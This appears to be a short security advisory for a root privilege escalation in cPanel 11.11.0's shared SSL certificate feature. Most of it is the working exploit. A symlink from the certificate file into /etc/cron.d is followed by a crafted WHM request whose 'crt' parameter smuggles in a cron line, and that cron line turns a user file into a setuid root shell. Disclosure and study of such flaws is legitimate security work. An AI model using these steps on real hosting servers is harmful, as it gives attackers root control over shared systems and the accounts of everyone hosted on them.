cPanel 11.11.0-STABLE_16789 - shared SSL cert root privilege escalation



DESCRIPTION


When a reseller used WHM to set an SSL certificate as a shared certificate, the file ".sharedcrtname" was written to the user's home directory as root. The contents of the .sharedcrtname file were able to be controlled by the reseller, effectively allowing them to create or overwrite any file on the box with the contents of their choice via a symlink attack.



IMPACT


Resellers could escalate their privileges to root.


Step 1:

[user@host ~]$ ln -s /home/user/.sharedsslcert /etc/cron.d/new_cron_job

By default, the .sharedsslcert file contains the domain name in the certificate. However, the contents of the file were controllable by the reseller via the "crt" variable.


Step 2:

GET /scripts2/setsharedsslstatus?crt=*%20*%20*%20*%20*%20root%20chown%20root.root%20 \
/home/$user/suid_shell;chmod%204755%20/home/$user/suid_shell%0a\0\r\n HTTP/1.0


That would create the file "/etc/cron.d/new_cron_job" with the following contents:

* * * * * root chown root.root /home/$user/suid_shell;chmod 4755 /home/$user/suid_shell


Even if this feature was not enabled for resellers in WHM, the request could still be sent without issue.